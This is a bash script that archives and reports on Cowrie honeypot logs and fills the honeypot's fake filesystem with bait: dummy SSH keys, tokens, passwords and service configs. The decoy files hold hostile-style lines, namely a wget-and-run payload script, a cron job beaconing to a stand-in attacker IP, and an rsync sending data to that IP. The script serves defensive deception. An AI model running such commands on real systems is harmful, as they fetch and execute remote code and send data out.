#!/bin/bash

set -e

BASE="/home/cowrie/cowrie"
HFS="$BASE/honeyfs"

echo "[+] Generating the most saturated fake environment for Cowrie..."

if [ ! -d "$HFS" ]; then
    echo "[!] Error: $HFS directory not found!"
    exit 1
fi

if [ ! -d "$HFS" ]; then
    echo "[!] Error: $HFS directory not found!"
    exit 1
fi

################################
# WEEKLY LOG ARCHIVE + CLEANUP
################################

ARCHIVE_DIR="/home/cowrie/archives"
LOG_DIR="/home/cowrie/cowrie/var/log/cowrie"

mkdir -p "$ARCHIVE_DIR"

# Archive logs if they exist
if [ -d "$LOG_DIR" ]; then
    TS=$(date +"%Y-%m-%d_%H-%M-%S")
    tar -czf "$ARCHIVE_DIR/cowrie_logs_$TS.tar.gz" "$LOG_DIR"
    echo "[+] The log archive has been saved: $ARCHIVE_DIR/cowrie_logs_$TS.tar.gz"
else
    echo "[!] Cowrie logs not found, skipping archiving"
fi

################################
# WEEKLY LOG ANALYSIS
################################

REPORT_FILE="$ARCHIVE_DIR/report_$TS.txt"

echo "Activity report for the period: $TS" > "$REPORT_FILE"
echo "==========================================" >> "$REPORT_FILE"

# Top attacker IPs
echo "" >> "$REPORT_FILE"
echo "[TOP IP addresses]" >> "$REPORT_FILE"
grep -h "login attempt" "$LOG_DIR"/*.log 2>/dev/null | awk '{print $NF}' | sort | uniq -c | sort -nr | head -20 >> "$REPORT_FILE"

# Top commands
echo "" >> "$REPORT_FILE"
echo "[Top commands]" >> "$REPORT_FILE"
grep -h "CMD:" "$LOG_DIR"/*.log 2>/dev/null | sed 's/.*CMD: //' | sort | uniq -c | sort -nr | head -20 >> "$REPORT_FILE"

# Files accessed
echo "" >> "$REPORT_FILE"
echo "[Files that were accessed]" >> "$REPORT_FILE"
grep -h "Opening file" "$LOG_DIR"/*.log 2>/dev/null | sed 's/.*file //' | sort | uniq -c | sort -nr | head -20 >> "$REPORT_FILE"

# Login attempts
echo "" >> "$REPORT_FILE"
echo "[Login attempts]" >> "$REPORT_FILE"
grep -h "login attempt" "$LOG_DIR"/*.log 2>/dev/null | sort | uniq -c | sort -nr >> "$REPORT_FILE"

# Total events
echo "" >> "$REPORT_FILE"
echo "[Total events]" >> "$REPORT_FILE"
grep -h "session" "$LOG_DIR"/*.log 2>/dev/null | wc -l >> "$REPORT_FILE"

echo "[+] The report has been generated: $REPORT_FILE"

# Cleanup old archives (older than 30 days)
find "$ARCHIVE_DIR" -type f -name "*.tar.gz" -mtime +30 -exec rm -f {} \;
echo "[+] Old archives (older than 30 days) have been deleted"

################################
# Cleaning up old honeyfs
################################

echo "[+] Cleaning up old honeyfs..."
sudo rm -rf "$HFS"/*
sudo mkdir -p "$HFS"

echo "[+] Cleaning up old honeyfs..."
sudo rm -rf "$HFS"/*
sudo mkdir -p "$HFS"

USERNAME="user$((RANDOM % 9000 + 1000))"
PASSWORD="$(tr -dc 'A-Za-z0-9!@#' </dev/urandom | head -c 12)"
GITHUB_TOKEN="ghp_$(tr -dc 'A-Za-z0-9' </dev/urandom | head -c 30)"
ATTACKER_IP="192.168.1.$((RANDOM % 100 + 100))"
PORT=$((RANDOM % 50000 + 10000))
PROCESS_ID=$((RANDOM % 3000 + 1000))

DEVOPS_USER="devops"
CI_USER="ci-runner"
BACKUP_USER="backup"
LEGACY_USER="legacyadmin"

echo "[+] Generated by:"
echo "    User: $USERNAME"
echo "    Password: $PASSWORD"
echo "    GitHub Token: $GITHUB_TOKEN"
echo "    Attacker's IP: $ATTACKER_IP"
echo "    PID: $PROCESS_ID"

mkdir -p \
    "$HFS/root/.ssh" \
    "$HFS/root/.config" \
    "$HFS/etc/systemd/system" \
    "$HFS/etc" \
    "$HFS/tmp" \
    "$HFS/var/www/html/logs" \
    "$HFS/var/spool/cron" \
    "$HFS/var/log" \
    "$HFS/var/backups" \
    "$HFS/var/lib/docker/containers/fakecontainer" \
    "$HFS/var/lib/docker/image" \
    "$HFS/etc/kubernetes" \
    "$HFS/var/lib/kubelet" \
    "$HFS/root/.kube" \
    "$HFS/opt/k8s/manifests" \
    "$HFS/opt/k8s/logs" \
    "$HFS/etc/ansible/playbooks" \
    "$HFS/opt/ansible/roles/internal/tasks" \
    "$HFS/opt/ansible/vault" \
    "$HFS/opt/ansible/inventory" \
    "$HFS/opt/ansible/logs" \
    "$HFS/opt/app/config" \
    "$HFS/opt/app/logs" \
    "$HFS/opt/app/data" \
    "$HFS/opt/backup/.ssh" \
    "$HFS/srv/data" \
    "$HFS/srv/legacy/.ssh" \
    "$HFS/home/$DEVOPS_USER/.ssh" \
    "$HFS/home/$CI_USER/.ssh" \
    "$HFS/home/$BACKUP_USER/.ssh" \
    "$HFS/home/$LEGACY_USER/.ssh" \
    "$HFS/proc/$PROCESS_ID"

################################
# ROOT
################################

cat > "$HFS/root/deploy.sh" <<EOF
#!/bin/bash
cd /opt/app
git pull origin master
./deploy.sh
EOF

cat > "$HFS/root/config.ini" <<EOF
[auth]
token = $GITHUB_TOKEN
EOF

echo "FAKE_SSH_PRIVATE_KEY" > "$HFS/root/id_rsa"
echo "Q2 Revenue: \$1,500,000" > "$HFS/root/finance.xlsx.fake"
echo "# Internal DevOps notes" > "$HFS/root/README.md"

cat > "$HFS/root/.bash_history" <<EOF
cd /opt/app
git status
nano config/app.yaml
sqlite3 /root/app.db
SELECT * FROM users;
systemctl status miner.service
systemctl status backup-sync.service
kubectl get pods
ansible-playbook /etc/ansible/playbooks/deploy.yml
EOF

cat > "$HFS/root/.bashrc" <<EOF
alias ll='ls -alF'
export SECRET_KEY='FAKE_SECRET_$RANDOM'
export APP_ENV=production
EOF

cat > "$HFS/root/.gitconfig" <<EOF
[user]
    name = D Blanko
    email = blanko@$USERNAME.internal.company
EOF

echo "https://$USERNAME:$GITHUB_TOKEN@github.com" > "$HFS/root/.git-credentials"

echo "INSERT INTO users (username, password) VALUES ('$USERNAME', '$PASSWORD');" > "$HFS/root/db_dump.sql"

################################
# SSH ROOT
################################

cat > "$HFS/root/.ssh/id_rsa" <<EOF
-----BEGIN OPENSSH PRIVATE KEY-----
FAKE-ROOT-KEY-$(tr -dc 'A-Za-z0-9' </dev/urandom | head -c 64)
-----END OPENSSH PRIVATE KEY-----
EOF

cat > "$HFS/root/.ssh/id_rsa.old" <<EOF
-----BEGIN OPENSSH PRIVATE KEY-----
FAKE-OLD-ROOT-KEY-$(tr -dc 'A-Za-z0-9' </dev/urandom | head -c 64)
-----END OPENSSH PRIVATE KEY-----
EOF

cat > "$HFS/root/.ssh/authorized_keys" <<EOF
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCFAKEDEVOPSKEY devops@ci-server
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFAKEBACKUPKEY backup@old-node
EOF

cat > "$HFS/root/.ssh/known_hosts" <<EOF
192.168.0.50 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDEVOPS
git.internal.company ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBACKUP
EOF

################################
# WEB
################################

cat > "$HFS/var/www/html/index.php" <<EOF
<?php
echo "Internal portal";
EOF

cat > "$HFS/var/www/html/db_config.php" <<EOF
<?php
\$host = 'localhost';
\$user = '$USERNAME';
\$pass = '$PASSWORD';
\$db   = 'appdb';
EOF

cat > "$HFS/var/www/html/logs/access.log" <<EOF
$ATTACKER_IP - - [10/Mar/2026:10:10:10 +0000] "GET /index.php HTTP/1.1" 200 1234 "-" "curl/7.68.0"
EOF

################################
# MALWARE
################################

cat > "$HFS/tmp/malware.sh" <<EOF
#!/bin/bash
wget http://$ATTACKER_IP/payload.zip -O /tmp/payload.zip
unzip /tmp/payload.zip -d /tmp/
python3 /tmp/dropper.py
EOF

echo "print('Connecting to C2 server...')" > "$HFS/tmp/dropper.py"
chmod +x "$HFS/tmp/malware.sh"

################################
# SYSTEM FILES
################################

cat > "$HFS/etc/passwd" <<EOF
root:x:0:0:root:/root:/bin/bash
$USERNAME:x:1001:1001:$USERNAME:/home/$USERNAME:/bin/bash
$DEVOPS_USER:x:1002:1002:$DEVOPS_USER:/home/$DEVOPS_USER:/bin/bash
$CI_USER:x:1003:1003:$CI_USER:/home/$CI_USER:/bin/bash
$BACKUP_USER:x:1004:1004:$BACKUP_USER:/home/$BACKUP_USER:/bin/bash
$LEGACY_USER:x:1005:1005:$LEGACY_USER:/home/$LEGACY_USER:/bin/bash
EOF

cat > "$HFS/etc/shadow" <<EOF
root:*:19000:0:99999:7:::
$USERNAME:*:19000:0:99999:7:::
$DEVOPS_USER:*:19000:0:99999:7:::
$CI_USER:*:19000:0:99999:7:::
$BACKUP_USER:*:19000:0:99999:7:::
$LEGACY_USER:*:18000:0:99999:7:::
EOF

echo "server { listen 80; server_name $USERNAME.internal.company; root /var/www/html; }" > "$HFS/etc/nginx.conf"

################################
# CRON
################################

cat > "$HFS/var/spool/cron/root" <<EOF
0 2 * * * /root/backup.sh
30 3 * * * /usr/bin/python3 /tmp/dropper.py
*/15 * * * * curl http://$ATTACKER_IP/beacon
EOF

################################
# LOGS
################################

cat > "$HFS/var/log/auth.log" <<EOF
Accepted password for $USERNAME from $ATTACKER_IP port $PORT ssh2
EOF

################################
# PROC
################################

echo "python3 /tmp/dropper.py" > "$HFS/proc/$PROCESS_ID/cmdline"
echo "C2 connection established" > "$HFS/proc/$PROCESS_ID/status"

################################
# BACKUP SCRIPT
################################

cat > "$HFS/root/backup.sh" <<EOF
#!/bin/bash
echo "Starting daily backup..."
sshpass -p '$PASSWORD' rsync -avz /srv/data/ root@$ATTACKER_IP:/backups/
echo "Backup completed."
EOF
chmod +x "$HFS/root/backup.sh"

################################
# /opt/app
################################

cat > "$HFS/opt/app/config/app.yaml" <<EOF
env: production
db_path: /opt/app/users.db
log_path: /opt/app/logs/app.log
EOF

cat > "$HFS/opt/app/logs/app.log" <<EOF
[2026-03-10 10:10:10] INFO Starting app in production
EOF

################################
# /srv/data
################################

echo "metric_name,metric_value,timestamp" > "$HFS/srv/data/metrics.csv"

################################
# BACKUPS
################################

echo "FAKE BACKUP ARCHIVE" > "$HFS/var/backups/app-backup-2026-03-01.tar.gz"

################################
# SQLITE
################################

echo "SQLite format 3" > "$HFS/root/app.db"
echo "SQLite format 3" > "$HFS/opt/app/users.db"
echo "SQLite format 3" > "$HFS/srv/data/metrics.db"
echo "SQLite format 3" > "$HFS/var/www/html/session.db"

################################
# USERS HOME
################################

cat > "$HFS/home/$DEVOPS_USER/.bash_history" <<EOF
cd /opt/app
git pull origin master
kubectl get pods
ansible-playbook /etc/ansible/playbooks/deploy.yml
EOF

cat > "$HFS/home/$DEVOPS_USER/.ssh/id_ed25519" <<EOF
-----BEGIN OPENSSH PRIVATE KEY-----
FAKE-DEVOPS-ED25519-$(tr -dc 'A-Za-z0-9' </dev/urandom | head -c 64)
-----END OPENSSH PRIVATE KEY-----
EOF

cat > "$HFS/home/$CI_USER/.bash_history" <<EOF
cd /opt/app
./run_tests.sh
EOF

cat > "$HFS/home/$CI_USER/.ssh/id_rsa" <<EOF
-----BEGIN OPENSSH PRIVATE KEY-----
FAKE-CI-RSA-$(tr -dc 'A-Za-z0-9' </dev/urandom | head -c 64)
-----END OPENSSH PRIVATE KEY-----
EOF

cat > "$HFS/home/$BACKUP_USER/.bash_history" <<EOF
rsync -avz /srv/data/ /var/backups/
EOF

cat > "$HFS/home/$BACKUP_USER/.ssh/id_rsa" <<EOF
-----BEGIN OPENSSH PRIVATE KEY-----
FAKE-BACKUP-RSA-$(tr -dc 'A-Za-z0-9' </dev/urandom | head -c 64)
-----END OPENSSH PRIVATE KEY-----
EOF

cat > "$HFS/home/$LEGACY_USER/.bash_history" <<EOF
cd /srv/legacy
EOF

cat > "$HFS/home/$LEGACY_USER/.ssh/id_rsa" <<EOF
-----BEGIN OPENSSH PRIVATE KEY-----
FAKE-LEGACY-RSA-$(tr -dc 'A-Za-z0-9' </dev/urandom | head -c 64)
-----END OPENSSH PRIVATE KEY-----
EOF

################################
# SYSTEMD
################################

cat > "$HFS/etc/systemd/system/miner.service" <<EOF
[Unit]
Description=Background Miner Service

[Service]
ExecStart=/usr/bin/python3 /tmp/dropper.py
Restart=always
EOF

cat > "$HFS/etc/systemd/system/backup-sync.service" <<EOF
[Unit]
Description=Backup Sync Service

[Service]
ExecStart=/root/backup.sh
Restart=on-failure
EOF

################################
# DOCKER
################################

cat > "$HFS/var/lib/docker/containers/fakecontainer/config.v2.json" <<EOF
{"Name":"internal_app","Image":"internal/app:latest","State":{"Running":true}}
EOF

echo "internal/app:latest" > "$HFS/var/lib/docker/image/fakeimage"

################################
# KUBERNETES
################################

cat > "$HFS/root/.kube/config" <<EOF
apiVersion: v1
clusters:
- cluster:
    server: https://10.0.0.1:6443
    certificate-authority-data: FAKECERTDATA==
  name: internal-cluster
contexts:
- context:
    cluster: internal-cluster
    user: admin
  name: admin@internal-cluster
current-context: admin@internal-cluster
users:
- name: admin
  user:
    token: eyFAKE.K8S.$(tr -dc 'A-Za-z0-9' </dev/urandom | head -c 20)
EOF

cat > "$HFS/opt/k8s/manifests/app-deployment.yaml" <<EOF
apiVersion: apps/v1
kind: Deployment
metadata:
  name: internal-app
spec:
  replicas: 3
  selector:
    matchLabels:
      app: internal
  template:
    metadata:
      labels:
        app: internal
    spec:
      containers:
      - name: internal
        image: internal/app:latest
EOF

cat > "$HFS/opt/k8s/logs/pod-internal-1.log" <<EOF
[2026-02-10 10:10:10] INFO Starting container
EOF

################################
# ANSIBLE
################################

cat > "$HFS/etc/ansible/hosts" <<EOF
[web]
192.168.0.50 ansible_user=devops ansible_ssh_private_key_file=/home/devops/.ssh/id_ed25519

[db]
192.168.0.60 ansible_user=root ansible_password=SuperSecret123
EOF

cat > "$HFS/etc/ansible/playbooks/deploy.yml" <<EOF
- hosts: web
  tasks:
    - name: Deploy internal app
      git:
        repo: "https://github.com/internal/app.git"
        dest: "/opt/app"
        version: master
EOF

cat > "$HFS/opt/ansible/roles/internal/tasks/main.yml" <<EOF
- name: Ensure directory exists
  file:
    path: /opt/app
    state: directory
EOF

cat > "$HFS/opt/ansible/vault/secret.yml" <<EOF
$ANSIBLE_VAULT;1.1;AES256
FAKEVAULTDATA1234567890
EOF

cat > "$HFS/opt/ansible/logs/run.log" <<EOF
[2026-03-10 10:10:10] PLAY [web]
EOF

################################
# TERRAFORM
################################

mkdir -p "$HFS/opt/terraform"
mkdir -p "$HFS/opt/terraform/envs/prod"
mkdir -p "$HFS/opt/terraform/envs/stage"

cat > "$HFS/opt/terraform/main.tf" <<EOF
terraform {
  required_version = ">= 1.0.0"
}

provider "aws" {
  region = "eu-central-1"
}

module "app" {
  source = "./modules/app"
  env    = "prod"
}
EOF

cat > "$HFS/opt/terraform/envs/prod/terraform.tfvars" <<EOF
env = "prod"
instance_type = "t3.medium"
EOF

cat > "$HFS/opt/terraform/envs/stage/terraform.tfvars" <<EOF
env = "stage"
instance_type = "t3.small"
EOF

cat > "$HFS/opt/terraform/terraform.tfstate" <<EOF
{
  "version": 4,
  "terraform_version": "1.5.0",
  "resources": []
}
EOF

################################
# JENKINS
################################

mkdir -p "$HFS/var/lib/jenkins/jobs/internal-app/builds"
mkdir -p "$HFS/var/lib/jenkins/workspace/internal-app"

cat > "$HFS/var/lib/jenkins/config.xml" <<EOF
<jenkins>
  <numExecutors>2</numExecutors>
  <mode>NORMAL</mode>
</jenkins>
EOF

cat > "$HFS/var/lib/jenkins/jobs/internal-app/config.xml" <<EOF
<project>
  <description>Build and deploy internal app</description>
  <builders>
    <hudson.tasks.Shell>
      <command>cd /opt/app && ./deploy.sh</command>
    </hudson.tasks.Shell>
  </builders>
</project>
EOF

cat > "$HFS/var/lib/jenkins/jobs/internal-app/builds/lastBuild" <<EOF
# Fake Jenkins build metadata
EOF

cat > "$HFS/var/lib/jenkins/workspace/internal-app/README.md" <<EOF
Internal app workspace for Jenkins.
EOF

################################
# PROMETHEUS
################################

mkdir -p "$HFS/etc/prometheus"
mkdir -p "$HFS/var/lib/prometheus"

cat > "$HFS/etc/prometheus/prometheus.yml" <<EOF
global:
  scrape_interval: 15s

scrape_configs:
  - job_name: 'internal-app'
    static_configs:
      - targets: ['localhost:9100']
EOF

cat > "$HFS/var/lib/prometheus/metrics.prom" <<EOF
internal_requests_total 1234
internal_errors_total 12
EOF

################################
# GRAFANA
################################

mkdir -p "$HFS/etc/grafana"
mkdir -p "$HFS/var/lib/grafana/dashboards"
mkdir -p "$HFS/var/lib/grafana/plugins"

cat > "$HFS/etc/grafana/grafana.ini" <<EOF
[server]
http_port = 3000

[security]
admin_user = admin
admin_password = admin123

[auth]
disable_login_form = false
EOF

cat > "$HFS/var/lib/grafana/dashboards/internal-app.json" <<EOF
{
  "title": "Internal App Dashboard",
  "panels": [
    {
      "type": "graph",
      "title": "Requests per second",
      "targets": [
        { "expr": "internal_requests_total" }
      ]
    }
  ]
}
EOF

echo "FAKEPLUGIN" > "$HFS/var/lib/grafana/plugins/fake-plugin.txt"

################################
# GITLAB RUNNER
################################

mkdir -p "$HFS/etc/gitlab-runner"
mkdir -p "$HFS/var/lib/gitlab-runner"
mkdir -p "$HFS/var/lib/gitlab-runner/builds"
mkdir -p "$HFS/var/log/gitlab-runner"

cat > "$HFS/etc/gitlab-runner/config.toml" <<EOF
concurrent = 2
check_interval = 0

[[runners]]
  name = "internal-runner"
  url = "https://gitlab.internal.company/"
  token = "$(tr -dc 'A-Za-z0-9' </dev/urandom | head -c 32)"
  executor = "shell"
EOF

cat > "$HFS/var/log/gitlab-runner/runner.log" <<EOF
[2026-03-10 10:10:10] INFO Starting GitLab Runner
[2026-03-10 10:10:11] INFO Runner internal-runner registered
EOF

cat > "$HFS/var/lib/gitlab-runner/builds/README.txt" <<EOF
Build artifacts directory for GitLab Runner.
EOF

################################
# ELASTICSEARCH
################################

mkdir -p "$HFS/etc/elasticsearch"
mkdir -p "$HFS/var/lib/elasticsearch"
mkdir -p "$HFS/var/log/elasticsearch"

cat > "$HFS/etc/elasticsearch/elasticsearch.yml" <<EOF
cluster.name: internal-logs
node.name: node-1
path.data: /var/lib/elasticsearch
path.logs: /var/log/elasticsearch
network.host: 127.0.0.1
EOF

cat > "$HFS/var/log/elasticsearch/elastic.log" <<EOF
[2026-03-10T10:10:10] INFO starting Elasticsearch node
[2026-03-10T10:10:11] WARN high memory pressure detected
EOF

echo "{}" > "$HFS/var/lib/elasticsearch/empty-index.json"

################################
# LOGSTASH
################################

mkdir -p "$HFS/etc/logstash/conf.d"
mkdir -p "$HFS/var/log/logstash"

cat > "$HFS/etc/logstash/logstash.yml" <<EOF
path.config: /etc/logstash/conf.d
EOF

cat > "$HFS/etc/logstash/conf.d/input.conf" <<EOF
input {
  beats {
    port => 5044
  }
}
EOF

cat > "$HFS/etc/logstash/conf.d/output.conf" <<EOF
output {
  elasticsearch {
    hosts => ["localhost:9200"]
    index => "internal-%{+YYYY.MM.dd}"
  }
}
EOF

cat > "$HFS/var/log/logstash/logstash.log" <<EOF
[2026-03-10 10:10:10] INFO Logstash started
EOF

################################
# KIBANA
################################

mkdir -p "$HFS/etc/kibana"
mkdir -p "$HFS/var/log/kibana"

cat > "$HFS/etc/kibana/kibana.yml" <<EOF
server.port: 5601
server.host: "0.0.0.0"
elasticsearch.hosts: ["http://localhost:9200"]
EOF

cat > "$HFS/var/log/kibana/kibana.log" <<EOF
[2026-03-10 10:10:10] INFO Kibana server is starting
EOF

################################
# REDIS
################################

mkdir -p "$HFS/etc/redis"
mkdir -p "$HFS/var/lib/redis"
mkdir -p "$HFS/var/log/redis"

cat > "$HFS/etc/redis/redis.conf" <<EOF
bind 127.0.0.1
port 6379
dir /var/lib/redis
EOF

cat > "$HFS/var/log/redis/redis.log" <<EOF
[2026-03-10 10:10:10] * Ready to accept connections
EOF

echo "key1:value1" > "$HFS/var/lib/redis/dump.rdb"

################################
# RABBITMQ
################################

mkdir -p "$HFS/etc/rabbitmq"
mkdir -p "$HFS/var/lib/rabbitmq"
mkdir -p "$HFS/var/log/rabbitmq"

cat > "$HFS/etc/rabbitmq/rabbitmq.conf" <<EOF
loopback_users.guest = false
listeners.tcp.default = 5672
EOF

cat > "$HFS/var/log/rabbitmq/rabbit.log" <<EOF
[2026-03-10 10:10:10] INFO RabbitMQ starting
[2026-03-10 10:10:11] INFO Message queue initialized
EOF

echo "FAKE_RABBIT_DATA" > "$HFS/var/lib/rabbitmq/mnesia.dat"

################################
# GITLAB (SERVER-SIDE)
################################

mkdir -p "$HFS/opt/gitlab/config"
mkdir -p "$HFS/opt/gitlab/logs"
mkdir -p "$HFS/opt/gitlab/data"

cat > "$HFS/opt/gitlab/config/gitlab.rb" <<EOF
external_url 'https://gitlab.internal.company'
gitlab_rails['gitlab_email_enabled'] = true
gitlab_rails['gitlab_email_from'] = 'noreply@gitlab.internal.company'
EOF

cat > "$HFS/opt/gitlab/logs/gitlab.log" <<EOF
[2026-03-10 10:10:10] INFO GitLab starting
[2026-03-10 10:10:11] WARN Sidekiq queue latency high
EOF

echo "FAKE_GITLAB_DB" > "$HFS/opt/gitlab/data/db.dump"

################################
# HARBOR REGISTRY
################################

mkdir -p "$HFS/etc/harbor"
mkdir -p "$HFS/var/lib/harbor/registry"
mkdir -p "$HFS/var/log/harbor"

cat > "$HFS/etc/harbor/harbor.yml" <<EOF
hostname: registry.internal.company
http:
  port: 5000
harbor_admin_password: "HarborAdmin123"
database:
  password: "HarborDBpass"
EOF

cat > "$HFS/var/log/harbor/registry.log" <<EOF
[2026-03-10 10:10:10] INFO Harbor registry started
EOF

echo "internal/app:latest" > "$HFS/var/lib/harbor/registry/repositories.txt"

################################
# CONSUL
################################

mkdir -p "$HFS/etc/consul.d"
mkdir -p "$HFS/var/lib/consul"
mkdir -p "$HFS/var/log/consul"

cat > "$HFS/etc/consul.d/consul.hcl" <<EOF
datacenter = "dc1"
data_dir = "/var/lib/consul"
server = true
bootstrap_expect = 1
EOF

cat > "$HFS/var/log/consul/consul.log" <<EOF
[2026-03-10 10:10:10] INFO Consul agent started
EOF

echo "{}" > "$HFS/var/lib/consul/raft.db"

################################
# HASHICORP VAULT
################################

mkdir -p "$HFS/etc/vault"
mkdir -p "$HFS/var/lib/vault"
mkdir -p "$HFS/var/log/vault"

cat > "$HFS/etc/vault/vault.hcl" <<EOF
storage "file" {
  path = "/var/lib/vault"
}

listener "tcp" {
  address = "127.0.0.1:8200"
  tls_disable = 1
}

ui = true
EOF

cat > "$HFS/var/log/vault/vault.log" <<EOF
[2026-03-10 10:10:10] INFO Vault server started
EOF

cat > "$HFS/var/lib/vault/secret.txt" <<EOF
VAULT_FAKE_ROOT_TOKEN=$(tr -dc 'A-Za-z0-9' </dev/urandom | head -c 32)
EOF

################################
# NOMAD
################################

mkdir -p "$HFS/etc/nomad.d"
mkdir -p "$HFS/var/lib/nomad"
mkdir -p "$HFS/var/log/nomad"

cat > "$HFS/etc/nomad.d/nomad.hcl" <<EOF
data_dir  = "/var/lib/nomad"
bind_addr = "0.0.0.0"

server {
  enabled          = true
  bootstrap_expect = 1
}
EOF

cat > "$HFS/var/log/nomad/nomad.log" <<EOF
[2026-03-10 10:10:10] INFO Nomad agent started
EOF

cat > "$HFS/var/lib/nomad/jobs.hcl" <<EOF
job "internal-app" {
  datacenters = ["dc1"]

  group "app" {
    task "web" {
      driver = "docker"
      config {
        image = "internal/app:latest"
      }
    }
  }
}
EOF

################################
# POSTGRESQL
################################

mkdir -p "$HFS/etc/postgresql"
mkdir -p "$HFS/var/lib/postgresql/data"
mkdir -p "$HFS/var/log/postgresql"

cat > "$HFS/etc/postgresql/postgresql.conf" <<EOF
listen_addresses = 'localhost'
port = 5432
max_connections = 100
shared_buffers = 128MB
data_directory = '/var/lib/postgresql/data'
EOF

cat > "$HFS/etc/postgresql/pg_hba.conf" <<EOF
local   all             postgres                                peer
local   all             all                                     md5
host    all             all             127.0.0.1/32            md5
EOF

cat > "$HFS/var/log/postgresql/postgresql.log" <<EOF
2026-03-10 10:10:10 UTC [1234] LOG:  starting PostgreSQL 14.1
2026-03-10 10:10:11 UTC [1234] LOG:  database system is ready to accept connections
EOF

cat > "$HFS/var/lib/postgresql/data/pg_version" <<EOF
14
EOF

cat > "$HFS/var/lib/postgresql/data/fake_dump.sql" <<EOF
CREATE TABLE users (id SERIAL PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users (username, password) VALUES ('admin', 'AdminPass123');
INSERT INTO users (username, password) VALUES ('devops', 'DevOpsPass456');
EOF

################################
# MYSQL
################################

mkdir -p "$HFS/etc/mysql"
mkdir -p "$HFS/var/lib/mysql"
mkdir -p "$HFS/var/log/mysql"

cat > "$HFS/etc/mysql/my.cnf" <<EOF
[mysqld]
user=mysql
port=3306
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
symbolic-links=0
EOF

cat > "$HFS/var/log/mysql/error.log" <<EOF
2026-03-10T10:10:10.000000Z 0 [Note] mysqld (mysqld 8.0.28) starting
2026-03-10T10:10:11.000000Z 0 [Note] Server hostname (bind-address): '127.0.0.1'
EOF

echo "FAKE_MYSQL_DATA" > "$HFS/var/lib/mysql/ibdata1"

cat > "$HFS/var/lib/mysql/fake_db.sql" <<EOF
CREATE TABLE accounts (id INT PRIMARY KEY, email VARCHAR(255), pass VARCHAR(255));
INSERT INTO accounts VALUES (1, 'root@example.com', 'RootPass123');
INSERT INTO accounts VALUES (2, 'user@example.com', 'UserPass456');
EOF

# Fake socket and pid
echo "3377" > "$HFS/var/lib/mysql/mysql.pid"
echo "" > "$HFS/var/lib/mysql/mysql.sock"

################################
# KAFKA
################################

mkdir -p "$HFS/etc/kafka"
mkdir -p "$HFS/var/lib/kafka"
mkdir -p "$HFS/var/log/kafka"

cat > "$HFS/etc/kafka/server.properties" <<EOF
broker.id=1
listeners=PLAINTEXT://:9092
log.dirs=/var/lib/kafka
zookeeper.connect=localhost:2181
EOF

cat > "$HFS/var/log/kafka/kafka.log" <<EOF
[2026-03-10 10:10:10] INFO Kafka server starting
[2026-03-10 10:10:11] WARN Partition under-replicated
EOF

echo "FAKE_KAFKA_LOG" > "$HFS/var/lib/kafka/000000000000.log"

################################
# ZOOKEEPER
################################

mkdir -p "$HFS/etc/zookeeper"
mkdir -p "$HFS/var/lib/zookeeper"
mkdir -p "$HFS/var/log/zookeeper"

cat > "$HFS/etc/zookeeper/zoo.cfg" <<EOF
tickTime=2000
dataDir=/var/lib/zookeeper
clientPort=2181
EOF

cat > "$HFS/var/log/zookeeper/zookeeper.log" <<EOF
[2026-03-10 10:10:10] INFO Zookeeper server started
EOF

echo "1" > "$HFS/var/lib/zookeeper/myid"

################################
# CEPH
################################

mkdir -p "$HFS/etc/ceph"
mkdir -p "$HFS/var/lib/ceph/osd"
mkdir -p "$HFS/var/log/ceph"

cat > "$HFS/etc/ceph/ceph.conf" <<EOF
[global]
fsid = $(tr -dc 'a-f0-9' </dev/urandom | head -c 32)
mon_initial_members = ceph-mon1
mon_host = 127.0.0.1
auth_cluster_required = none
auth_service_required = none
auth_client_required = none
EOF

cat > "$HFS/var/log/ceph/ceph.log" <<EOF
[2026-03-10 10:10:10] INFO starting Ceph OSD
EOF

echo "FAKE_CEPH_OSD_DATA" > "$HFS/var/lib/ceph/osd/osd.0"

################################
# MINIO
################################

mkdir -p "$HFS/etc/minio"
mkdir -p "$HFS/var/lib/minio"
mkdir -p "$HFS/var/log/minio"

cat > "$HFS/etc/minio/minio.conf" <<EOF
MINIO_ROOT_USER=minioadmin
MINIO_ROOT_PASSWORD=minioadmin123
MINIO_VOLUMES="/var/lib/minio"
EOF

cat > "$HFS/var/log/minio/minio.log" <<EOF
[2026-03-10 10:10:10] INFO MinIO server started
EOF

echo "FAKE_MINIO_OBJECT" > "$HFS/var/lib/minio/object.bin"

################################
# PERMISSIONS
################################

sudo chown -R cowrie:cowrie "$HFS"
sudo chmod -R 755 "$HFS"

################################
# FS.PICKLE
################################

echo "[+] Rebuilding fs.pickle..."
sudo -iu cowrie bash <<EOF
cd /home/cowrie/cowrie
source cowrie-env/bin/activate
rm -f src/cowrie/data/fs.pickle
python3 /home/cowrie/cowrie/cowrie-env/bin/createfs -l honeyfs -o src/cowrie/data/fs.pickle
EOF

################################
# RESTART
################################

echo "[+] Cowrie Restart..."
sudo systemctl restart cowrie

echo "[✓] The most saturated honeypot environment is deployed!"
echo "    User: $USERNAME"
echo "    Password: $PASSWORD"
echo "    GitHub Token: $GITHUB_TOKEN"
echo "    Attacker's IP: $ATTACKER_IP"
echo "    PID: $PROCESS_ID"
